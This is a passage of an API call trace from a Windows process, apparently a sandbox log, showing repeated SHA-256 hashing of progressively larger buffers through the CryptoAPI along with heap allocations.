	[0239.715] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.715] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0239.715] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.715] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c19d0
	[0239.715] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c19d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c19d0, pdwDataLen=0x128ba4) returned 1
	[0239.715] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.715] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.715] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.715] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.715] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0239.715] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.715] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c19f8
	[0239.715] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c19f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c19f8, pdwDataLen=0x128ba4) returned 1
	[0239.715] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.715] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.715] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.716] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.716] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0239.716] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.716] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1a20
	[0239.716] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1a20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1a20, pdwDataLen=0x128ba4) returned 1
	[0239.716] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.716] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.716] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.716] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.716] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0239.716] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.716] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1a48
	[0239.716] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1a48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1a48, pdwDataLen=0x128ba4) returned 1
	[0239.717] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.717] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.717] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.717] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.717] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0239.717] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.717] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1a70
	[0239.717] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1a70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1a70, pdwDataLen=0x128ba4) returned 1
	[0239.717] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.717] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.717] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.718] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.718] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0239.718] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1a98
	[0239.718] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1a98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1a98, pdwDataLen=0x128ba4) returned 1
	[0239.718] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.718] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.718] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.718] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.718] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0239.718] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.718] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1ac0
	[0239.718] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1ac0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1ac0, pdwDataLen=0x128ba4) returned 1
	[0239.718] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.718] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.718] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.719] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.719] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0239.719] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1ae8
	[0239.719] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1ae8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1ae8, pdwDataLen=0x128ba4) returned 1
	[0239.719] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.719] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.719] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.719] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.719] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0239.719] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1b10
	[0239.719] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1b10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1b10, pdwDataLen=0x128ba4) returned 1
	[0239.719] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.720] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.720] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.720] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.720] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0239.720] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.720] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1b38
	[0239.720] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1b38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1b38, pdwDataLen=0x128ba4) returned 1
	[0239.720] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.720] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.720] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.721] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.721] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0239.721] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.721] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1b60
	[0239.721] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1b60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1b60, pdwDataLen=0x128ba4) returned 1
	[0239.721] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.721] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.721] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.721] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.721] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0239.721] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.721] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1b88
	[0239.721] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1b88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1b88, pdwDataLen=0x128ba4) returned 1
	[0239.721] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.721] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.721] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.722] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.722] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0239.722] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.722] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1bb0
	[0239.722] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1bb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1bb0, pdwDataLen=0x128ba4) returned 1
	[0239.722] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.722] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.722] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.722] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.722] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0239.722] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.722] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1bd8
	[0239.722] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1bd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1bd8, pdwDataLen=0x128ba4) returned 1
	[0239.722] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.722] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.723] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.723] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.723] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0239.723] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.723] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1c00
	[0239.723] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1c00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1c00, pdwDataLen=0x128ba4) returned 1
	[0239.723] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.723] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.723] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.724] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.724] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0239.724] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.724] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1c28
	[0239.724] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1c28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1c28, pdwDataLen=0x128ba4) returned 1
	[0239.724] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.724] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.724] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.724] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.724] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0239.724] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.724] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1c50
	[0239.724] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1c50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1c50, pdwDataLen=0x128ba4) returned 1
	[0239.724] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.724] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.724] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.725] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.725] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0239.725] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.725] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1c78
	[0239.725] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1c78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1c78, pdwDataLen=0x128ba4) returned 1
	[0239.725] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.725] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.725] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.725] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.725] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0239.725] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.725] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1ca0
	[0239.725] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1ca0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1ca0, pdwDataLen=0x128ba4) returned 1
	[0239.725] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.725] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.725] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.775] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.775] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0239.775] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1cc8
	[0239.775] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1cc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1cc8, pdwDataLen=0x128ba4) returned 1
	[0239.775] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.775] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.775] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.775] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.775] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0239.775] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf658
	[0239.775] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf658, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf658, pdwDataLen=0x128ba4) returned 1
	[0239.775] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.775] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.775] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.776] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.776] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0239.776] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.776] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf590
	[0239.776] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf590, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf590, pdwDataLen=0x128ba4) returned 1
	[0239.776] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.776] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.776] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.776] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.776] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0239.777] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.777] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf5e0
	[0239.777] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf5e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf5e0, pdwDataLen=0x128ba4) returned 1
	[0239.777] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.777] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.777] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.777] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.777] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0239.777] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.777] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf7c0
	[0239.777] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf7c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf7c0, pdwDataLen=0x128ba4) returned 1
	[0239.777] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.777] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.777] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.778] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.778] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0239.778] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf5b8
	[0239.778] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf5b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf5b8, pdwDataLen=0x128ba4) returned 1
	[0239.778] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.778] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.778] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
